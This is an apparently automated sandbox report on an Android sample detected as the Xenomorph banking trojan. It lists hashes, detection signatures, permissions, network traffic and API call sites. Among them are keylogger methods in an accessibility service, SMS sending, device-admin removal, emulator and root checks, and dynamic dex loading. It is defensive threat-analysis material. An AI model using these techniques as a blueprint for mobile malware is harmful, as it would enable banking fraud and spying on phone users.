Edit tour

Android Analysis Report
Vezmhoup7U

Overview

General Information

Sample Name:	Vezmhoup7U
Analysis ID:	1315840
MD5:	e4e0ad27227e83a4e0536a6b5c05cf30
SHA1:	7901d85f316d293da81b8114b0523033d65d6b85
SHA256:	259e88f593a3df5cf14924eec084d904877953c4a78ed4a2bc9660a2eaabb20b
Infos:

Detection

Xenomorph

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected Xenomorph

Antivirus / Scanner detection for submitted sample

Loads a dropped dex file via MultiDexApplication

Removes its application launcher (likely to stay hidden)

Tries to disable the administrator user

Drops a new dex file

Found potential keylogger

Kills background processes

Checks if app is currently debugged

Checks if taint analysis is available

Uses accessibility services (likely to control other applications)

Checks if a SIM card is installed

Queries list of running processes/tasks

Queries media storage location field

Tries to detect QEMU emulator

Queries the SIM provider name (SPN - Service Provider Name)

Obfuscates method names

Has permission to read the SMS storage

Installs a new wake lock (to get activate on phone screen on)

Found suspicious command strings (may be related to BOT commands)

Monitors incoming SMS

Sends SMS using SmsManager

Checks an internet connection is available

Queries list of installed packages

Found very long method strings

Checks if phone is rooted (checks for su binary)

Creates SMS data (e.g. PDU)

Requests potentially dangerous permissions

Requests root access

Potential date aware sample found

Has permission to perform phone calls in the background

May take a camera picture

Queries the phones location (GPS)

Opens an internet connection

Queries the network operator name

May access the Android keyguard (lock screen)

Aborts a broadcast event (this is often done to hide phone events such as incoming SMS)

Has permission to receive SMS in the background

Lists and deletes files in the same context

Queries a list of installed applications

Uses DownloadManager to fetch additional components

Queries the network operator ISO country code

Detected TCP or UDP traffic on non-standard ports

Has functionality to send UDP packets

Has permission to draw over other applications or user interfaces

Queries the unqiue device ID (IMEI, MEID or ESN)

Accesses /proc

Has permission to read the phones state (phone number, device IDs, active call ect.)

Queries the SIM provider ISO country code

Might use exploit to break dedexer tools

Accesses android OS build fields

Executes native commands

Reads boot loader settings of the device

Checks if the device administrator is active

Performs DNS lookups (Java API)

Queries the network operator numeric MCC+MNC (mobile country code + mobile network code)

Queries several sensitive phone informations

Has permission to send SMS in the background

Checks CPU details

Queries the unique operating system id (ANDROID_ID)

Has permission to terminate background processes of other applications

Sets an intent to the APK data type (used to install other APKs)

Has permission to execute code after phone reboot

Uses reflection

Classification

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Xenomorph	Xenomorph is a Android Banking RAT developed by the Hadoken.Security actor.	No Attribution	https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5 https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html	https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph

HTTP traffic detected: POST /log/batch HTTP/1.1X-SERVER-TOKEN: CAMSAA==Cookie: NID=511=OLYowT9x9h3aPNSBkb9FHCd14M8lazG-E5GsYYpVMgEMi6g_ntIQUO8R1UY52IJccGgh4LyZVbveQMt-bxLrSN9_E-dPhq9UdTbSJ86VaYkrcC90k2thNRSVrsOgvCmtICwhlIyWnD0_klyohvlQM-jDU2WIW-B-3IqRfY9c5r4User-Agent: Android/com.google.android.gms/210214031 (x86 PI); gzipcontent-type: application/x-gzipcontent-encoding: gzipTransfer-Encoding: chunkedHost: play.googleapis.comConnection: Keep-AliveAccept-Encoding: gzip

Source: com.kwai.video.ksmediaplayerkit.Utils.NetworkReceiver;->a:6	API Call: android.content.IntentFilter.addAction android.net.conn.CONNECTIVITY_CHANGE
Source: com.kwai.video.wayne.extend.decision.NetworkReceiver;->a:9	API Call: android.content.IntentFilter.addAction android.net.conn.CONNECTIVITY_CHANGE
Source: com.xiaomi.mipush.sdk.h;->v:766	API Call: android.content.IntentFilter.addAction android.net.conn.CONNECTIVITY_CHANGE

Source: global traffic	HTTP traffic detected: GET /chrome-variations/seed?osname=android_webview&milestone=75&channel=stable HTTP/1.1A-IM: gzipUser-Agent: Dalvik/2.1.0 (Linux; U; Android 9; VMware Virtual Platform Build/PI)Host: clientservices.googleapis.comConnection: Keep-AliveAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /n3w3rras HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; VMware Virtual Platform Build/PI)Host: t.meConnection: Keep-AliveAccept-Encoding: gzip

Source: unknown	HTTPS traffic detected: 142.250.65.195:443 -> 192.168.2.30:46744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.30:52096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.65.170:443 -> 192.168.2.30:32896 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Found potential keylogger

Source: Lcom/mtnyrvojt/qtbxtwjnq/services/FitnessAccessibilityService;->onAccessibilityEvent(Landroid/view/accessibility/AccessibilityEvent;)V	Instruction: "lcom/mtnyrvojt/qtbxtwjnq/services/fitnessaccessibilityservice;->logaccessibilitykeylogger(landroid/view/accessibility/accessibilityevent;)v"
Source: Lcom/mtnyrvojt/qtbxtwjnq/services/FitnessAccessibilityService;->onAccessibilityEvent(Landroid/view/accessibility/AccessibilityEvent;)V	Instruction: "lcom/mtnyrvojt/qtbxtwjnq/services/fitnessaccessibilityservice;->writekeyloggerjournal(landroid/view/accessibility/accessibilityevent;)v"
Source: Lcom/mtnyrvojt/qtbxtwjnq/logging/KeyloggerLogJournalEntry;-><init>(Landroid/view/accessibility/AccessibilityEvent;Ljava/lang/String;Ljava/lang/String;)V	Instruction: "iput-object v5, v2, lcom/mtnyrvojt/qtbxtwjnq/logging/keyloggerlogjournalentry;->keyloggereventtype:ljava/lang/string;"
Source: Lcom/mtnyrvojt/qtbxtwjnq/api/tdp/ApiOperationRequestPayload;-><init>(Landroid/content/Context;Ljava/lang/String;)V	Instruction: "iput-object v2, v0, lcom/mtnyrvojt/qtbxtwjnq/api/tdp/apioperationrequestpayload;->keylog:ljava/util/list;"

Source: com.mtnyrvojt.qtbxtwjnq.socks.Socks5Impl;->udpSend:225

API Call: java.net.DatagramSocket.send

Spam, unwanted Advertisements and Ransom Demands

Tries to disable the administrator user

Source: com.mtnyrvojt.qtbxtwjnq.activities.AdminActivity;->onCreate:42	API Call: android.app.admin.DevicePolicyManager.removeActiveAdmin
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->selfRemove:860	API Call: android.app.admin.DevicePolicyManager.removeActiveAdmin

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->sendSMS:878

API Call: android.telephony.SmsManager.sendMultipartTextMessage

Source: submitted apk

Request permission: android.permission.CALL_PHONE

Source: submitted apk

Request permission: android.permission.SEND_SMS

Operating System Destruction

Kills background processes

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->killApplicationByPackage:683

API Call: android.app.ActivityManager.killBackgroundProcesses

Source: com.unionpay.utils.b;->c:126	API Calls in same method context: File.listFiles,File.delete
Source: com.xiaomi.push.au;->a:91	API Calls in same method context: File.listFiles,File.delete
Source: com.huawei.updatesdk.a.a.d.d;->a:40	API Calls in same method context: File.listFiles,File.delete
Source: com.xiaomi.push.ch;->b:32	API Calls in same method context: File.listFiles,File.delete
Source: com.kwai.video.b.a.b;->b:81	API Calls in same method context: File.listFiles,File.delete
Source: com.facebook.react.modules.camera.ImageEditingManager$a;->a:5	API Calls in same method context: File.listFiles,File.delete
Source: com.bumptech.glide.disklrucache.c;->a:11	API Calls in same method context: File.listFiles,File.delete
Source: com.hhmedic.android.sdk.uikit.utils.HHFileUtils;->deleteUploadFiles:57	API Calls in same method context: File.listFiles,File.delete
Source: com.huawei.hms.hatool.c0;->b:19	API Calls in same method context: File.listFiles,File.delete
Source: com.xiaomi.push.service.y;->a:110	API Calls in same method context: File.listFiles,File.delete
Source: okhttp3.internal.io.FileSystem$Companion$SYSTEM$1;->deleteContents:27	API Calls in same method context: File.listFiles,File.delete

Source: classes.dex	String found in binary or memory: Landroid/app/KeyguardManager;
Source: classes.dex	String found in binary or memory: Landroid/app/KeyguardManager;!Landroid/app/Notification$Action;*Landroid/app/Notification$BigPictureStyle;'Landroid/app/Notification$BigTextStyle;"Landroid/app/Notification$Builder; Landroid/app/Notification$Style;
Source: classes.dex	String found in binary or memory: canShowOnKeyguard
Source: classes.dex	String found in binary or memory: enable_keyguard
Source: classes.dex	String found in binary or memory: inKeyguardRestrictedInputMode
Source: classes.dex	String found in binary or memory: inKeyguardRestrictedInputModeinMutable
Source: classes.dex	String found in binary or memory: isKeyguardSecure
Source: classes.dex	String found in binary or memory: keyguard
Source: classes.dex	String found in binary or memory: miui.enableKeyguard
Source: classes.dex	String found in binary or memory: miui.enableKeyguard"miui.intent.action.APP_PERM_EDITOR"miui.intent.action.NETWORK_BLOCKED$miui.intent.action.NETWORK_CONNECTED
Source: classes.dex	String found in binary or memory: setEnableKeyguard
Source: classes.dex	String found in binary or memory: setShowOnKeyguard
Source: lkfupve.gvo.dr	String found in binary or memory: Landroid/app/KeyguardManager;
Source: lkfupve.gvo.dr	String found in binary or memory: Landroid/app/KeyguardManager;"Landroid/app/Notification$Builder;
Source: lkfupve.gvo.dr	String found in binary or memory: inKeyguardRestrictedInputMode
Source: android	String found in binary or memory: enable_keyguard
Source: android	String found in binary or memory: keyguard
Source: android	String found in binary or memory: setShowOnKeyguard
Source: android	String found in binary or memory: miui.enableKeyguard
Source: android	String found in binary or memory: canShowOnKeyguard
Source: android	String found in binary or memory: setEnableKeyguard

Source: com.mtnyrvojt.qtbxtwjnq.services.EndlessService;->startService:39	API Call: android.os.PowerManager$WakeLock.acquire
Source: com.mtnyrvojt.qtbxtwjnq.services.KingService;->resetWakeLock:41	API Call: android.os.PowerManager$WakeLock.acquire
Source: com.kwai.video.aemonplayer.AemonMediaPlayerAdapter;->setWakeMode:1147	API Call: android.os.PowerManager$WakeLock.acquire
Source: com.kwai.video.aemonplayer.AemonMediaPlayerAdapter;->stayAwake:1190	API Call: android.os.PowerManager$WakeLock.acquire
Source: com.kwai.video.player.kwai_player.KwaiMediaPlayer;->stayAwake:135	API Call: android.os.PowerManager$WakeLock.acquire
Source: com.kwai.video.player.kwai_player.KwaiMediaPlayer;->setWakeMode:787	API Call: android.os.PowerManager$WakeLock.acquire
Source: com.kwai.video.player.KsMediaPlayerImpl;->a:6	API Call: android.os.PowerManager$WakeLock.acquire

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->startRepeatingAlarm:1097

API Call: android.app.AlarmManager.setRepeating

Source: submitted apk	Request permission: android.permission.CALL_PHONE
Source: submitted apk	Request permission: android.permission.INTERNET
Source: submitted apk	Request permission: android.permission.READ_PHONE_STATE
Source: submitted apk	Request permission: android.permission.READ_SMS
Source: submitted apk	Request permission: android.permission.RECEIVE_SMS
Source: submitted apk	Request permission: android.permission.SEND_SMS
Source: submitted apk	Request permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apk	Request permission: android.permission.WAKE_LOCK
Source: submitted apk	Request permission: android.permission.WRITE_EXTERNAL_STORAGE
Source: submitted apk	Request permission: android.permission.WRITE_SETTINGS

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->getXiaomiVersionMIUI:458	API Call: java.lang.Runtime.exec
Source: com.kwai.video.wayne.player.f.i;->c:53	API Call: java.lang.Runtime.exec
Source: com.hhmedic.android.sdk.module.permission.romUtils.RomUtils;->getSystemProperty:49	API Call: java.lang.Runtime.exec
Source: com.unionpay.mobile.android.pboctransaction.sdapdu.b;->b:13	API Call: java.lang.ProcessBuilder.start
Source: com.facebook.react.modules.systeminfo.a;->d:42	API Call: java.lang.Runtime.exec

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->SettingsRead:8	API Call: android.content.SharedPreferences.getString
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->settingsReadBoolean:951	API Call: android.content.SharedPreferences.getBoolean
Source: com.kwai.video.ksmediaplayerkit.Utils.d;->a:11	API Call: android.content.SharedPreferences.getString
Source: com.huawei.hms.availableupdate.a;->a:10	API Call: android.content.SharedPreferences.getString
Source: com.huawei.hms.availableupdate.a;->a:15	API Call: android.content.SharedPreferences.getString
Source: com.huawei.updatesdk.b.b.b;->a:11	API Call: android.content.SharedPreferences.getString
Source: com.alipay.security.mobile.module.c.e;->a:2	API Call: android.content.SharedPreferences.getString
Source: com.kwai.video.cache.f;->a:21	API Call: android.content.SharedPreferences.getString
Source: com.hhmedic.android.sdk.base.utils.cache.HHSharedPreferences;->getValue:14	API Call: android.content.SharedPreferences.getString
Source: com.huawei.hms.framework.common.PLSharedPreferences;->getSharedPreferences:9	API Call: android.content.SharedPreferences.getBoolean
Source: com.huawei.hms.framework.common.PLSharedPreferences;->getString:28	API Call: android.content.SharedPreferences.getString
Source: com.kwai.video.ksmediaplayerkit.config.e;->b:8	API Call: android.content.SharedPreferences.getString
Source: com.alipay.sdk.data.b;->d:75	API Call: android.content.SharedPreferences.getString
Source: com.alipay.sdk.data.b;->e:106	API Call: android.content.SharedPreferences.getString
Source: com.kwai.video.wayne.extend.decision.h;->b:8	API Call: android.content.SharedPreferences.getString
Source: com.huawei.hms.hatool.g0;->a:11	API Call: android.content.SharedPreferences.getString
Source: com.kwai.video.wayne.player.config.ks_sub.m;->a:10	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.ax;->b:21	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.ch$c;->e:8	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.cv;->run:76	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.gh;->a:8	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.iv;->a:3	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.iz;->b:35	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ad;->a:949	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:16	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:19	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:22	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:25	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:28	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:46	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:49	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.mipush.sdk.ao;->o:52	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.mipush.sdk.ao;->o:58	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.ao;->o:61	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.av;->a:10	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.av;->a:15	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.av;->a:24	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.av;->a:27	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.h;->a:370	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.mipush.sdk.x;->a:14	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.mipush.sdk.h;->u:763	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ad;->a:85	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ad;->a:89	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ad;->a:148	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.service.ad;->a:152	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.service.XMPushService;->d:651	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.XMPushService;->d:686	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ay;->e:13	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ba;->a:21	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cj;->a:12	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ck;->e:195	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cn;->a:10	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ck;->j:238	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.service.ck;->l:265	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.ck;->l:298	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.service.ck;->l:301	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.service.cq;->a:6	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cq;->a:8	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cq;->a:10	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cq;->a:12	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cq;->a:14	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cq;->a:16	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cq;->a:18	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cr;-><init>:12	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cr;-><init>:20	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.cr;-><init>:28	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.o;->a:9	API Call: android.content.SharedPreferences.getString
Source: com.xiaomi.push.service.v;->c:290	API Call: android.content.SharedPreferences.getBoolean
Source: com.xiaomi.push.service.v;->c:295	API Call: android.content.SharedPreferences.getBoolean
Source: com.alipay.sdk.tid.a$a;->a:16	API Call: android.content.SharedPreferences.getString
Source: com.alipay.sdk.util.h;->b:30	API Call: android.content.SharedPreferences.getString
Source: com.huawei.secure.android.common.ssl.util.g;->b:15	API Call: android.content.SharedPreferences.getString
Source: com.unionpay.mobile.android.utils.PreferenceUtils;->a:6	API Call: android.content.SharedPreferences.getString
Source: com.unionpay.mobile.android.utils.PreferenceUtils;->a:8	API Call: android.content.SharedPreferences.getString
Source: com.unionpay.mobile.android.utils.PreferenceUtils;->a:27	API Call: android.content.SharedPreferences.getString
Source: com.unionpay.mobile.android.utils.PreferenceUtils;->b:73	API Call: android.content.SharedPreferences.getString
Source: com.unionpay.mobile.android.utils.PreferenceUtils;->b:75	API Call: android.content.SharedPreferences.getString
Source: com.unionpay.utils.UPUtils;->a:5	API Call: android.content.SharedPreferences.getString
Source: com.huawei.hms.aaid.utils.PushPreferences;-><init>:5	API Call: android.content.SharedPreferences.getBoolean
Source: com.huawei.hms.aaid.utils.PushPreferences;->getBoolean:76	API Call: android.content.SharedPreferences.getBoolean
Source: com.huawei.hms.aaid.utils.PushPreferences;->getString:83	API Call: android.content.SharedPreferences.getString

Source: com.kwai.video.player.a.e;->b:6	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.player.a.d;->b:34	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.player.a.g;->b:5	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.player.a.g;->b:8	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.player.a.f;->b:40	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.a.a$1;->a:3	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.wayne.extend.a.b$1;->a:9	API Call: java.lang.System.loadLibrary
Source: com.unionpay.b.b;-><init>:10	API Call: java.lang.System.loadLibrary
Source: com.unionpay.b.e;-><init>:10	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.cache.a$1;->a:12	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.wayne.extend.a$1;->a:3	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.ksmediaplayerkit.KSMeidaPlayerDynamicSo;->a:7	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.ksmediaplayerkit.e$4;->a:4	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.ksmediaplayerkit.e;->b:47	API Call: java.lang.System.loadLibrary
Source: com.unionpay.tsmservice.mi.UPTsmAddon;-><clinit>:3	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.player.k$2;->a:10	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.player.k$1;->a:10	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.wayne.player.i$2;->a:11	API Call: java.lang.System.loadLibrary
Source: com.kwai.video.wayne.player.i$1;->a:16	API Call: java.lang.System.loadLibrary
Source: com.unionpay.tsmservice.UPTsmAddon;-><clinit>:3	API Call: java.lang.System.loadLibrary
Source: com.unionpay.UPPayAssistEx;->c:562	API Call: java.lang.System.loadLibrary
Source: com.unionpay.UPPayAssistEx;->s:694	API Call: java.lang.System.loadLibrary
Source: com.unionpay.uppay.PayActivity;-><clinit>:3	API Call: java.lang.System.loadLibrary

Source: com.xiaomi.push.providers.a;->a:30

API Call: android.database.sqlite.SQLiteDatabase.execSQL

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.and@0/253@0/0

Data Obfuscation

Loads a dropped dex file via MultiDexApplication

Source: qeh.focrjqv.vcfumjvbt.qnpew.fefuwlrrh;->hqtehcb:22

File Path: /data/user/0/com.mtnyrvojt.qtbxtwjnq/app_app_dex/lkfupve.gvo

Source: fixed-Vezmhoup7U

Total valid method names: 52%

Source: Lcom/alipay/sdk/widget/d;->b(Ljava/lang/String;)V	Method string: javascript:(function() {\n if (window.AlipayJSBridge) {\n return\n }\n\n function alipayjsbridgeFunc(url) {\n var iframe = document.createElement(\"iframe\");\n iframe.style.width = \"1px\";\n iframe.style.height = \"1 Length: 5046
Source: Lcom/mtnyrvojt/qtbxtwjnq/accessibility/runtime/base/RuntimeAccessibilityDefinedOperations;-><clinit>()V	Method string: Length: 5498
Source: Lcom/mtnyrvojt/qtbxtwjnq/Constants;-><clinit>()V	Method string: Length: 5592
Source: Lcom/alipay/sdk/widget/d;->h()V	Method string: javascript:(function() {\n if (window.AlipayJSBridge) {\n return\n }\n\n function alipayjsbridgeFunc(url) {\n var iframe = document.createElement(\"iframe\");\n iframe.style.width = \"1px\";\n iframe.style.height = \"1 Length: 5102
Source: Lokhttp3/CipherSuite;-><clinit>()V	Method string: Length: 10417
Source: Lcom/mtnyrvojt/qtbxtwjnq/services/FitnessAccessibilityService;-><clinit>()V	Method string: Length: 5351
Source: Lcom/unionpay/utils/g;->a(I)Landroid/graphics/drawable/Drawable;	Method string: 89504e470d0a1a0a0000000d49484452000000210000003c0806000000e8acd32a000000097048597300000b1300000b1301009a9c1800000a4d6943435050686f746f73686f70204943432070726f66696c65000078da9d53775893f7163edff7650f5642d8f0b1976c81002223ac08c81059a21092006184101240c585880 Length: 6798
Source: Lcom/mtnyrvojt/qtbxtwjnq/utilities/UtilGlobal;-><clinit>()V	Method string: Length: 6153
Source: Lkotlin/collections/ArraysKt___ArraysKt;-><clinit>()V	Method string: Length: 40551
Source: Lkotlin/collections/CollectionsKt___CollectionsKt;-><clinit>()V	Method string: Length: 6992
Source: Lretrofit2/ServiceMethod$Builder;-><clinit>()V	Method string: Length: 5264
Source: Lkotlin/sequences/SequencesKt___SequencesKt;-><clinit>()V	Method string: Length: 5042
Source: Lkotlin/text/StringsKt__StringsJVMKt;-><clinit>()V	Method string: Length: 4597
Source: Lkotlin/text/StringsKt__StringsKt;-><clinit>()V	Method string: Length: 5144
Source: Lkotlin/text/StringsKt___StringsKt;-><clinit>()V	Method string: VPCLQDMPO Length: 5750
Source: Lkotlin/collections/unsigned/UArraysKt___UArraysKt;-><clinit>()V	Method string: Length: 10159

Source: vpj.dlomnfe.lmdfwblpk.hisci.kfvgsrhmkgglgvslmvco;->ittnnheimjopesbn:6	API Call: Real call: android.content.res.AssetManager@61455ac
Source: vpj.dlomnfe.lmdfwblpk.hisci.kfvgsrhmkgglgvslmvco;->ittnnheimjopesbn:6	API Call: Real call: public int android.content.res.AssetManager.addAssetPath(java.lang.String)
Source: vpj.dlomnfe.lmdfwblpk.hisci.kfvgsrhmkgglgvslmvco;->ittnnheimjopesbn:6	API Call: Real call: android.content.res.AssetManager@61455ac
Source: vpj.dlomnfe.lmdfwblpk.hisci.kfvgsrhmkgglgvslmvco;->ittnnheimjopesbn:6	API Call: Real call: public int android.content.res.AssetManager.addAssetPath(java.lang.String)
Source: qeh.focrjqv.vcfumjvbt.qnpew.fefuwlrrh;->hqtehcb:12	API Call: Real call: private final dalvik.system.DexPathList dalvik.system.BaseDexClassLoader.pathList
Source: qeh.focrjqv.vcfumjvbt.qnpew.fefuwlrrh;->hqtehcb:15	API Call: Real call: private dalvik.system.DexPathList$Element[] dalvik.system.DexPathList.dexElements
Source: qeh.focrjqv.vcfumjvbt.qnpew.fefuwlrrh;->hqtehcb:22	API Call: Real call: DexPathList[[zip file "/data/app/com.mtnyrvojt.qtbxtwjnq-aIX0U8xd5Sk9yco9oZ6-9A==/base.apk"],nativeLibraryDirectories=[/data/app/com.mtnyrvojt.qtbxtwjnq-aIX0U8xd5Sk9yco9oZ6-9A==/lib/x86, /system/lib, /system/vendor/lib]]
Source: qeh.focrjqv.vcfumjvbt.qnpew.fefuwlrrh;->hqtehcb:22	API Call: Real call: private static dalvik.system.DexPathList$Element[] dalvik.system.DexPathList.makePathElements(java.util.List,java.io.File,java.util.List)
Source: igj.fqqsllh.nmgcgvfum.ofwrk.igjsnhkhj;->rflfshhstnf:63	API Call: Real call: /data/user/0/com.mtnyrvojt.qtbxtwjnq/app_app_dex/oat
Source: igj.fqqsllh.nmgcgvfum.ofwrk.igjsnhkhj;->rflfshhstnf:63	API Call: Real call: public boolean java.io.File.delete()
Source: igj.fqqsllh.nmgcgvfum.ofwrk.igjsnhkhj;->rflfshhstnf:63	API Call: Real call: public boolean java.io.File.delete()
Source: igj.fqqsllh.nmgcgvfum.ofwrk.igjsnhkhj;->rflfshhstnf:64	API Call: Real call: /data/user/0/com.mtnyrvojt.qtbxtwjnq/app_app_dex
Source: igj.fqqsllh.nmgcgvfum.ofwrk.igjsnhkhj;->rflfshhstnf:64	API Call: Real call: public boolean java.io.File.delete()
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->upemmkkhtkpe:52	API Call: Real call: com.mtnyrvojt.qtbxtwjnq.App@acf6e27
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->upemmkkhtkpe:52	API Call: Real call: final void android.app.Application.attach(android.content.Context)
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->upemmkkhtkpe:52	API Call: Real call: android.app.ContextImpl@de1ba7d
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->upemmkkhtkpe:52	API Call: Real call: final void android.app.ContextImpl.setOuterContext(android.content.Context)
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->mpwdhnllpkmwk:38	API Call: Real call: final android.app.ActivityThread android.app.ContextImpl.mMainThread
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->mpwdhnllpkmwk:38	API Call: Real call: final java.util.ArrayList android.app.ActivityThread.mAllApplications
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->mpwdhnllpkmwk:38	API Call: Real call: final android.app.LoadedApk android.app.ContextImpl.mPackageInfo
Source: hcd.hskgsvc.wlnkbevpb.tkkjv.nbgljef;->mpwdhnllpkmwk:38	API Call: Real call: private android.content.pm.ApplicationInfo android.app.LoadedApk.mApplicationInfo
Source: com.kwai.video.ksmediaplayerkit.Utils.c;->d:36	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.security.mobile.module.a.a;->a:5	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.security.mobile.module.a.a;->b:19	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.security.mobile.module.a.a.c;->a:49	API Call: java.lang.reflect.Method.invoke
Source: com.alipay.a.a.g;->a:11	API Call: java.lang.reflect.Field.get
Source: com.kwai.video.hodor.a.a;->a:52	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.activity.BridgeActivity$a;->onApplyWindowInsets:6	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.activity.BridgeActivity$a;->onApplyWindowInsets:14	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.activity.BridgeActivity;->a:10	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.activity.BridgeActivity;->a:20	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.activity.BridgeActivity;->a:54	API Call: java.lang.reflect.Method.invoke
Source: com.huawei.hms.core.aidl.e;->b:23	API Call: java.lang.reflect.Field.get
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->configureTlsExtensions:25	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->configureTlsExtensions:27	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->configureTlsExtensions:31	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->getSelectedProtocol:38	API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.CloseGuard;->createAndOpen:8	API Call: java.lang.reflect.Method.invoke
